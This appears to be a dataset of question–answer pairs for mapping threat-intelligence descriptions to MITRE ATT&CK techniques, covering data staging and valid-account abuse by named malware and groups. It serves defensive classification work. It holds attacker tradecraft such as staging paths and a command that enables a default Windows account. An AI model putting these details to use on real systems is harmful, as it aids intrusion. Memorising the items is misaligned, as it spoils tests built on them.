+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LoFiSe can save files to be evaluated for further exfiltration in the `C:\Programdata\Microsoft\` and `C:\windows\temp\` folders.,"Tecnique: T1074.001 Data Staged: Local Data Staging, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MESSAGETAP stored targeted SMS messages that matched its target list in CSV files on the compromised system.,"Tecnique: T1074.001 Data Staged: Local Data Staging, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MacMa has stored collected files locally before exfiltration.,"Tecnique: T1074.001 Data Staged: Local Data Staging, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Machete stores files and logs in a folder on the local drive.,"Tecnique: T1074.001 Data Staged: Local Data Staging, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mafalda can place retrieved files into a destination directory.,"Tecnique: T1074.001 Data Staged: Local Data Staging, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MarkiRAT can store collected data locally in a created .nfo file.,"Tecnique: T1074.001 Data Staged: Local Data Staging, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Milan has saved files prior to upload from a compromised host to folders beginning with the characters `a9850d2f`.,"Tecnique: T1074.001 Data Staged: Local Data Staging, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mis-Type has temporarily stored collected information to the files `“%AppData%\{Unique Identifier}\HOSTRURKLSR”` and `“%AppData%\{Unique Identifier}\NEWERSSEMP”`.,"Tecnique: T1074.001 Data Staged: Local Data Staging, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MoonWind saves information from its keylogging routine as a .zip file in the present working directory.,"Tecnique: T1074.001 Data Staged: Local Data Staging, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NETWIRE has the ability to write collected data to a file created in the ./LOGS directory.,"Tecnique: T1074.001 Data Staged: Local Data Staging, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NOKKI can collect data from the victim and stage it in LOCALAPPDATA%\MicroSoft Updatea\uplog.tmp.,"Tecnique: T1074.001 Data Staged: Local Data Staging, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NavRAT writes multiple outputs to a TMP file using the >> method.,"Tecnique: T1074.001 Data Staged: Local Data Staging, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NightClub has copied captured files and keystrokes to the `%TEMP%` directory of compromised hosts.,"Tecnique: T1074.001 Data Staged: Local Data Staging, Tactic: TA0009 Collection"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ObliqueRAT can copy specific files, webcam captures, and screenshots to local directories.","Tecnique: T1074.001 Data Staged: Local Data Staging, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Octopus has stored collected information in the Application Data directory on a compromised host.,"Tecnique: T1074.001 Data Staged: Local Data Staging, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OopsIE stages the output from command execution and collected files in specific folders before exfiltration.,"Tecnique: T1074.001 Data Staged: Local Data Staging, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PACEMAKER has written extracted data to `tmp/dsserver-check.statementcounters`.,"Tecnique: T1074.001 Data Staged: Local Data Staging, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PUNCHBUGGY has saved information to a random temp file before exfil.,"Tecnique: T1074.001 Data Staged: Local Data Staging, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PUNCHTRACK aggregates collected data in a tmp file.,"Tecnique: T1074.001 Data Staged: Local Data Staging, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PoisonIvy stages collected data in a text file.,"Tecnique: T1074.001 Data Staged: Local Data Staging, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PowerLess can stage stolen browser data in `C:\\Windows\\Temp\\cup.tmp` and keylogger data in `C:\\Windows\\Temp\\Report.06E17A5A-7325-4325-8E5D-E172EBA7FC5BK`.,"Tecnique: T1074.001 Data Staged: Local Data Staging, Tactic: TA0009 Collection"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Prikormka creates a directory, %USERPROFILE%\AppData\Local\SKC\, which is used to store collected log files.","Tecnique: T1074.001 Data Staged: Local Data Staging, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pteranodon creates various subdirectories under %Temp%\reports\% and copies files to those subdirectories. It also creates a folder at C:\Users\\AppData\Roaming\Microsoft\store to store screenshot JPEG files.,"Tecnique: T1074.001 Data Staged: Local Data Staging, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: QakBot has stored stolen emails and other data into new folders prior to exfiltration.,"Tecnique: T1074.001 Data Staged: Local Data Staging, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RainyDay can use a file exfiltration tool to copy files to C:\ProgramData\Adobe\temp prior to exfiltration.,"Tecnique: T1074.001 Data Staged: Local Data Staging, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ramsay can stage data prior to exfiltration in %APPDATA%\Microsoft\UserSetting and %APPDATA%\Microsoft\UserSetting\MediaCache.,"Tecnique: T1074.001 Data Staged: Local Data Staging, Tactic: TA0009 Collection"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Data captured by RawPOS is placed in a temporary file under a directory named ""memdump"".","Tecnique: T1074.001 Data Staged: Local Data Staging, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Rover copies files from removable drives to C:\system.,"Tecnique: T1074.001 Data Staged: Local Data Staging, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SLIGHTPULSE has piped the output from executed commands to `/tmp/1`.,"Tecnique: T1074.001 Data Staged: Local Data Staging, Tactic: TA0009 Collection"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SLOWPULSE can write logged ACE credentials to `/home/perl/PAUS.pm` in append mode, using the format string `%s:%s\n`.","Tecnique: T1074.001 Data Staged: Local Data Staging, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SPACESHIP identifies files with certain extensions and copies them to a directory in the user's profile.,"Tecnique: T1074.001 Data Staged: Local Data Staging, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: STARWHALE has stored collected data in a file called `stari.txt`.,"Tecnique: T1074.001 Data Staged: Local Data Staging, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SUGARDUMP has stored collected data under `%%\\CrashLog.txt`.,"Tecnique: T1074.001 Data Staged: Local Data Staging, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SocGholish can send output from `whoami` to a local temp file using the naming convention `rad<5-hex-chars>.tmp`.,"Tecnique: T1074.001 Data Staged: Local Data Staging, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SombRAT can store harvested data in a custom database under the %TEMP% directory.,"Tecnique: T1074.001 Data Staged: Local Data Staging, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Trojan.Karagany can create directories to store plugin output and stage data for exfiltration.,"Tecnique: T1074.001 Data Staged: Local Data Staging, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Turian can store copied files in a specific directory prior to exfiltration.,"Tecnique: T1074.001 Data Staged: Local Data Staging, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: USBStealer collects files matching certain criteria from the victim and stores them in a local directory for later exfiltration.,"Tecnique: T1074.001 Data Staged: Local Data Staging, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ursnif has used tmp files to stage gathered information.,"Tecnique: T1074.001 Data Staged: Local Data Staging, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Zebrocy stores all collected information in a single file before exfiltration.,"Tecnique: T1074.001 Data Staged: Local Data Staging, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ccf32 can temporarily store files in a hidden directory on the local host.,"Tecnique: T1074.001 Data Staged: Local Data Staging, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: metaMain has stored the collected system files in a working directory.,"Tecnique: T1074.001 Data Staged: Local Data Staging, Tactic: TA0009 Collection"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Night Dragon, threat actors copied files to company web servers and subsequently downloaded them.","Tecnique: T1074.002 Data Staged: Remote Data Staging, Tactic: TA0009 Collection"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During the SolarWinds Compromise, APT29 staged data and files in password-protected archives on a victim's OWA server.","Tecnique: T1074.002 Data Staged: Remote Data Staging, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT28 has staged archives of collected data on a target's Outlook Web Access (OWA) server.,"Tecnique: T1074.002 Data Staged: Remote Data Staging, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Chimera has staged stolen data on designated servers in the target environment.,"Tecnique: T1074.002 Data Staged: Remote Data Staging, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN6 actors have compressed data from remote systems and moved it to another staging system before exfiltration.,"Tecnique: T1074.002 Data Staged: Remote Data Staging, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN8 aggregates staged data from a network into a single location.,"Tecnique: T1074.002 Data Staged: Remote Data Staging, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Leviathan has staged data remotely prior to exfiltration.,"Tecnique: T1074.002 Data Staged: Remote Data Staging, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MoustachedBouncer has used plugins to save captured screenshots to `.\AActdata\` on an SMB share.,"Tecnique: T1074.002 Data Staged: Remote Data Staging, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Threat Group-3390 has moved staged encrypted archives to Internet-facing servers that had previously been compromised with China Chopper prior to exfiltration.,"Tecnique: T1074.002 Data Staged: Remote Data Staging, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ToddyCat manually transferred collected files to an exfiltration host using xcopy.,"Tecnique: T1074.002 Data Staged: Remote Data Staging, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: menuPass has staged data on remote MSP systems or other victim networks prior to exfiltration.,"Tecnique: T1074.002 Data Staged: Remote Data Staging, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ccf32 has copied files to a remote machine infected with Chinoxy or another backdoor.,"Tecnique: T1074.002 Data Staged: Remote Data Staging, Tactic: TA0009 Collection"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During the 2015 Ukraine Electric Power Attack, Sandworm Team used valid accounts on the corporate network to escalate privileges, move laterally, and establish persistence within the corporate network.","Tecnique: T1078 Valid Accounts, Tactic: TA0005 Defense Evasion TA0001 Initial Access TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During the C0032 campaign, TEMP.Veles used compromised VPN accounts.","Tecnique: T1078 Valid Accounts, Tactic: TA0005 Defense Evasion TA0001 Initial Access TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Night Dragon, threat actors used compromised VPN accounts to gain access to victim systems.","Tecnique: T1078 Valid Accounts, Tactic: TA0005 Defense Evasion TA0001 Initial Access TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Wocao, threat actors used valid VPN credentials to gain initial access.","Tecnique: T1078 Valid Accounts, Tactic: TA0005 Defense Evasion TA0001 Initial Access TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During the SolarWinds Compromise, APT29 used different compromised credentials for remote access and to move laterally.","Tecnique: T1078 Valid Accounts, Tactic: TA0005 Defense Evasion TA0001 Initial Access TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT18 actors leverage legitimate credentials to log into external remote services.,"Tecnique: T1078 Valid Accounts, Tactic: TA0005 Defense Evasion TA0001 Initial Access TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT28 has used legitimate credentials to gain initial access, maintain access, and exfiltrate data from a victim network. The group has specifically used credentials stolen through a spearphishing email to login to the DCCC network. The group has also leveraged default manufacturer's passwords to gain initial access to corporate networks via IoT devices such as a VOIP phone, printer, and video decoder.","Tecnique: T1078 Valid Accounts, Tactic: TA0005 Defense Evasion TA0001 Initial Access TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT29 has used a compromised account to access an organization's VPN infrastructure.,"Tecnique: T1078 Valid Accounts, Tactic: TA0005 Defense Evasion TA0001 Initial Access TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT33 has used valid accounts for initial access and privilege escalation.,"Tecnique: T1078 Valid Accounts, Tactic: TA0005 Defense Evasion TA0001 Initial Access TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT39 has used stolen credentials to compromise Outlook Web Access (OWA).,"Tecnique: T1078 Valid Accounts, Tactic: TA0005 Defense Evasion TA0001 Initial Access TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT41 used compromised credentials to log on to other systems.,"Tecnique: T1078 Valid Accounts, Tactic: TA0005 Defense Evasion TA0001 Initial Access TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Akira uses valid account information to remotely access victim networks, such as VPN credentials.","Tecnique: T1078 Valid Accounts, Tactic: TA0005 Defense Evasion TA0001 Initial Access TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Axiom has used previously compromised administrative accounts to escalate privileges.,"Tecnique: T1078 Valid Accounts, Tactic: TA0005 Defense Evasion TA0001 Initial Access TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Carbanak actors used legitimate credentials of banking employees to perform operations that sent them millions of dollars.,"Tecnique: T1078 Valid Accounts, Tactic: TA0005 Defense Evasion TA0001 Initial Access TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Chimera has used a valid account to maintain persistence via scheduled task.,"Tecnique: T1078 Valid Accounts, Tactic: TA0005 Defense Evasion TA0001 Initial Access TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cinnamon Tempest has used compromised user accounts to deploy payloads and create system services.,"Tecnique: T1078 Valid Accounts, Tactic: TA0005 Defense Evasion TA0001 Initial Access TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Dragonfly has compromised user credentials and used valid accounts for operations.,"Tecnique: T1078 Valid Accounts, Tactic: TA0005 Defense Evasion TA0001 Initial Access TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN10 has used stolen credentials to connect remotely to victim networks using VPNs protected with only a single factor.,"Tecnique: T1078 Valid Accounts, Tactic: TA0005 Defense Evasion TA0001 Initial Access TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN4 has used legitimate credentials to hijack email communications.,"Tecnique: T1078 Valid Accounts, Tactic: TA0005 Defense Evasion TA0001 Initial Access TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN5 has used legitimate VPN, RDP, Citrix, or VNC credentials to maintain access to a victim environment.","Tecnique: T1078 Valid Accounts, Tactic: TA0005 Defense Evasion TA0001 Initial Access TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: To move laterally on a victim network, FIN6 has used credentials stolen from various systems on which it gathered usernames and password hashes.","Tecnique: T1078 Valid Accounts, Tactic: TA0005 Defense Evasion TA0001 Initial Access TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN7 has harvested valid administrative credentials for lateral movement.,"Tecnique: T1078 Valid Accounts, Tactic: TA0005 Defense Evasion TA0001 Initial Access TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN8 has used valid accounts for persistence and lateral movement.,"Tecnique: T1078 Valid Accounts, Tactic: TA0005 Defense Evasion TA0001 Initial Access TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Fox Kitten has used valid credentials with various services during lateral movement.,"Tecnique: T1078 Valid Accounts, Tactic: TA0005 Defense Evasion TA0001 Initial Access TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GALLIUM leveraged valid accounts to maintain access to a victim network.,"Tecnique: T1078 Valid Accounts, Tactic: TA0005 Defense Evasion TA0001 Initial Access TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ke3chang has used credential dumpers or stealers to obtain legitimate credentials, which they used to gain access to victim accounts.","Tecnique: T1078 Valid Accounts, Tactic: TA0005 Defense Evasion TA0001 Initial Access TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LAPSUS$ has used compromised credentials and/or session tokens to gain access into a victim's VPN, VDI, RDP, and IAMs.","Tecnique: T1078 Valid Accounts, Tactic: TA0005 Defense Evasion TA0001 Initial Access TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lazarus Group has used administrator credentials to gain access to restricted network segments.,"Tecnique: T1078 Valid Accounts, Tactic: TA0005 Defense Evasion TA0001 Initial Access TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Leviathan has obtained valid accounts to gain initial access.,"Tecnique: T1078 Valid Accounts, Tactic: TA0005 Defense Evasion TA0001 Initial Access TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OilRig has used compromised credentials to access other systems on a victim network.,"Tecnique: T1078 Valid Accounts, Tactic: TA0005 Defense Evasion TA0001 Initial Access TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: POLONIUM has used valid compromised credentials to gain access to victim environments.,"Tecnique: T1078 Valid Accounts, Tactic: TA0005 Defense Evasion TA0001 Initial Access TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PittyTiger attempts to obtain legitimate credentials during operations.,"Tecnique: T1078 Valid Accounts, Tactic: TA0005 Defense Evasion TA0001 Initial Access TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sandworm Team have used previously acquired legitimate credentials prior to attacks.,"Tecnique: T1078 Valid Accounts, Tactic: TA0005 Defense Evasion TA0001 Initial Access TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Silence has used compromised credentials to log on to other systems and escalate privileges.,"Tecnique: T1078 Valid Accounts, Tactic: TA0005 Defense Evasion TA0001 Initial Access TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Silent Librarian has used compromised credentials to obtain unauthorized access to online accounts.,"Tecnique: T1078 Valid Accounts, Tactic: TA0005 Defense Evasion TA0001 Initial Access TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Suckfly used legitimate account credentials that they dumped to navigate the internal victim network as though they were the legitimate account owner.,"Tecnique: T1078 Valid Accounts, Tactic: TA0005 Defense Evasion TA0001 Initial Access TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Threat Group-3390 actors obtain legitimate credentials using a variety of methods and use them to further lateral movement on victim networks.,"Tecnique: T1078 Valid Accounts, Tactic: TA0005 Defense Evasion TA0001 Initial Access TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Wizard Spider has used valid credentials for privileged accounts with the goal of accessing domain controllers.,"Tecnique: T1078 Valid Accounts, Tactic: TA0005 Defense Evasion TA0001 Initial Access TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: menuPass has used valid accounts including shared between Managed Service Providers and clients to move between the two environments.,"Tecnique: T1078 Valid Accounts, Tactic: TA0005 Defense Evasion TA0001 Initial Access TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Dtrack used hard-coded credentials to gain access to a network share.,"Tecnique: T1078 Valid Accounts, Tactic: TA0005 Defense Evasion TA0001 Initial Access TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Adversaries can instruct Duqu to spread laterally by copying itself to shares it has enumerated and for which it has obtained legitimate credentials (via keylogging or other means). The remote host is then infected by using the compromised credentials to schedule a task on remote machines that executes the malware.,"Tecnique: T1078 Valid Accounts, Tactic: TA0005 Defense Evasion TA0001 Initial Access TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Industroyer can use supplied user credentials to execute processes and stop services.,"Tecnique: T1078 Valid Accounts, Tactic: TA0005 Defense Evasion TA0001 Initial Access TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kinsing has used valid SSH credentials to access remote hosts.,"Tecnique: T1078 Valid Accounts, Tactic: TA0005 Defense Evasion TA0001 Initial Access TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Linux Rabbit acquires valid SSH accounts through brute force.,"Tecnique: T1078 Valid Accounts, Tactic: TA0005 Defense Evasion TA0001 Initial Access TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Some SeaDuke samples have a module to extract email from Microsoft Exchange servers using compromised credentials.,"Tecnique: T1078 Valid Accounts, Tactic: TA0005 Defense Evasion TA0001 Initial Access TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN13 has leveraged default credentials for authenticating myWebMethods (WMS) and QLogic web management interface to gain initial access.,"Tecnique: T1078.001 Valid Accounts: Default Accounts, Tactic: TA0005 Defense Evasion TA0001 Initial Access TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Magic Hound enabled and used the default system managed account, DefaultAccount, via `""powershell.exe"" /c net user DefaultAccount /active:yes` to connect to a targeted Exchange server over RDP.","Tecnique: T1078.001 Valid Accounts: Default Accounts, Tactic: TA0005 Defense Evasion TA0001 Initial Access TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HyperStack can use default credentials to connect to IPC$ shares on remote machines.,"Tecnique: T1078.001 Valid Accounts: Default Accounts, Tactic: TA0005 Defense Evasion TA0001 Initial Access TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Stuxnet infected WinCC machines via a hardcoded database server password.,"Tecnique: T1078.001 Valid Accounts: Default Accounts, Tactic: TA0005 Defense Evasion TA0001 Initial Access TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Cutting Edge, threat actors used compromised VPN accounts for lateral movement on targeted networks.","Tecnique: T1078.002 Valid Accounts: Domain Accounts, Tactic: TA0005 Defense Evasion TA0001 Initial Access TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Night Dragon, threat actors used domain accounts to gain further access to victim systems.","Tecnique: T1078.002 Valid Accounts: Domain Accounts, Tactic: TA0005 Defense Evasion TA0001 Initial Access TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation CuckooBees, the threat actors used compromised domain administrator credentials as part of their lateral movement.","Tecnique: T1078.002 Valid Accounts: Domain Accounts, Tactic: TA0005 Defense Evasion TA0001 Initial Access TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: For Operation Ghost, APT29 used stolen administrator credentials for lateral movement on compromised networks.","Tecnique: T1078.002 Valid Accounts: Domain Accounts, Tactic: TA0005 Defense Evasion TA0001 Initial Access TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Wocao, threat actors used domain credentials, including domain admin, for lateral movement and privilege escalation.","Tecnique: T1078.002 Valid Accounts: Domain Accounts, Tactic: TA0005 Defense Evasion TA0001 Initial Access TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During the SolarWinds Compromise, APT29 used domain administrators' accounts to help facilitate lateral movement on compromised networks.","Tecnique: T1078.002 Valid Accounts: Domain Accounts, Tactic: TA0005 Defense Evasion TA0001 Initial Access TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT3 leverages valid accounts after gaining credentials for use within the victim domain.,"Tecnique: T1078.002 Valid Accounts: Domain Accounts, Tactic: TA0005 Defense Evasion TA0001 Initial Access TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT5 has used legitimate account credentials to move laterally through compromised environments.,"Tecnique: T1078.002 Valid Accounts: Domain Accounts, Tactic: TA0005 Defense Evasion TA0001 Initial Access TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Chimera has used compromised domain accounts to gain access to the target environment.,"Tecnique: T1078.002 Valid Accounts: Domain Accounts, Tactic: TA0005 Defense Evasion TA0001 Initial Access TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cinnamon Tempest has obtained highly privileged credentials such as domain administrator in order to deploy malware.,"Tecnique: T1078.002 Valid Accounts: Domain Accounts, Tactic: TA0005 Defense Evasion TA0001 Initial Access TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Indrik Spider has collected credentials from infected systems, including domain accounts.","Tecnique: T1078.002 Valid Accounts: Domain Accounts, Tactic: TA0005 Defense Evasion TA0001 Initial Access TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Magic Hound has used domain administrator accounts after dumping LSASS process memory.,"Tecnique: T1078.002 Valid Accounts: Domain Accounts, Tactic: TA0005 Defense Evasion TA0001 Initial Access TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Naikon has used administrator credentials for lateral movement in compromised networks.,"Tecnique: T1078.002 Valid Accounts: Domain Accounts, Tactic: TA0005 Defense Evasion TA0001 Initial Access TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sandworm Team has used stolen credentials to access administrative accounts within the domain.,"Tecnique: T1078.002 Valid Accounts: Domain Accounts, Tactic: TA0005 Defense Evasion TA0001 Initial Access TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TA505 has used stolen domain admin accounts to compromise additional hosts.,"Tecnique: T1078.002 Valid Accounts: Domain Accounts, Tactic: TA0005 Defense Evasion TA0001 Initial Access TA0003 Persistence TA0004 Privilege Escalation "
